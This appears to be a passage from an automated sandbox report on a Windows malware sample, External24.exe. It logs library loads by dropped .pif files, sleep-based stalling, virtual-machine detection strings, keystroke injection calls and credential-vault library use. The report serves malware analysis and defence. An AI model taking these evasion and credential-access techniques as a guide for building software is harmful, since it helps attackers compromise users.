Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: gpedit.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: activeds.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dssec.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dsuiext.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: adsldpc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: authz.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: devobj.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Section loaded: d2d1.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00628AA5 push ecx; ret	15_2_00628AB8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068E86F push edi; ret	21_2_0068E871
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006C88B7 push FFFFFF8Bh; iretd	21_2_006C88B9
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068E988 push esi; ret	21_2_0068E98A
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006AEA3E push 00000000h; retn 006Ah	21_2_006AEA4C
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00688AA5 push ecx; ret	21_2_00688AB8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068EB63 push esi; ret	21_2_0068EB65
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0067CBDD push eax; retf	21_2_0067CBF8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_0068EC4C push edi; ret	21_2_0068EC4E
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006D72DC push eax; iretd	21_2_006D72DD

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_0068577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	15_2_0068577B
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Code function: 15_2_00615EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	15_2_00615EDA
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_006E577B IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	21_2_006E577B
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00675EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	21_2_00675EDA

Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\External24.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\External24.exe	Stalling execution: Execution stalls by calling Sleep			graph_0-3858
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Stalling execution: Execution stalls by calling Sleep

Source: C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	API coverage: 5.4 %
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	API coverage: 8.7 %

Source: C:\Windows\SysWOW64\timeout.exe TID: 6244	Thread sleep count: 122 > 30			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif TID: 2800	Thread sleep time: -30101s >= -30000s			Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000&
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}G
Source: Lawyers.pif, 00000015.00000002.3502285683.0000000006176000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lawyers.pif, 00000015.00000002.3501287006.0000000000F05000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}>Y0W
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&0000001.19041.2006_none_d94bc80de1097097\gdiplus.dlllYrc
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000002.3501287006.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Lawyers.pif, 00000015.00000002.3502285683.0000000006176000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}txt*N
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}/7rrP9UK+nYJkDUaruLFsmiax3GAXC2Igj63N1koqBHsy38rIIvg==_b3i0u6LLcKCMUaF/UlQgEPSL9PtLZ21CuT1dJkfCzME=*wT<
Source: Lawyers.pif, 00000015.00000002.3502181741.0000000006154000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 9e146be9-c76a-4720-bcdb-53011b87bd06_{a33c7340-61ca-11ee-8c18-806e6f6e6963}_\\?\scsi#disk&ven_vmware&prod_virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}_8D4D65C4
Source: Lawyers.pif, 00000015.00000003.2961599363.0000000000F08000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: Lawyers.pif, 00000015.00000002.3501596780.0000000000F26000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3349195349.0000000000F26000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWjS
Source: PixelFlow.pif, 0000000F.00000002.1742294834.00000000039DE000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif, 0000000F.00000003.1735274226.00000000039D7000.00000004.00000020.00020000.00000000.sdmp, PixelFlow.pif, 0000000F.00000003.1734640266.00000000039CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA102 mov eax, dword ptr fs:[00000030h]	21_2_00BAA102
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA102 mov ecx, dword ptr fs:[00000030h]	21_2_00BAA102
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C186C0 mov eax, dword ptr fs:[00000030h]	21_2_00C186C0
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA6B7 mov eax, dword ptr fs:[00000030h]	21_2_00BAA6B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA6B7 mov eax, dword ptr fs:[00000030h]	21_2_00BAA6B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BAA6B7 mov eax, dword ptr fs:[00000030h]	21_2_00BAA6B7
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov eax, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov eax, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov eax, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BA95B8 mov ecx, dword ptr fs:[00000030h]	21_2_00BA95B8
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C23600 mov eax, dword ptr fs:[00000030h]	21_2_00C23600
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BE5790 mov eax, dword ptr fs:[00000030h]	21_2_00BE5790
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BADB00 mov eax, dword ptr fs:[00000030h]	21_2_00BADB00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00BADB00 mov eax, dword ptr fs:[00000030h]	21_2_00BADB00
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C26280 mov eax, dword ptr fs:[00000030h]	21_2_00C26280
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C1A502 mov eax, dword ptr fs:[00000030h]	21_2_00C1A502
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C1A6B3 mov eax, dword ptr fs:[00000030h]	21_2_00C1A6B3
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C18C58 mov eax, dword ptr fs:[00000030h]	21_2_00C18C58
Source: C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	Code function: 21_2_00C16D80 mov eax, dword ptr fs:[00000030h]	21_2_00C16D80

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report External24.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

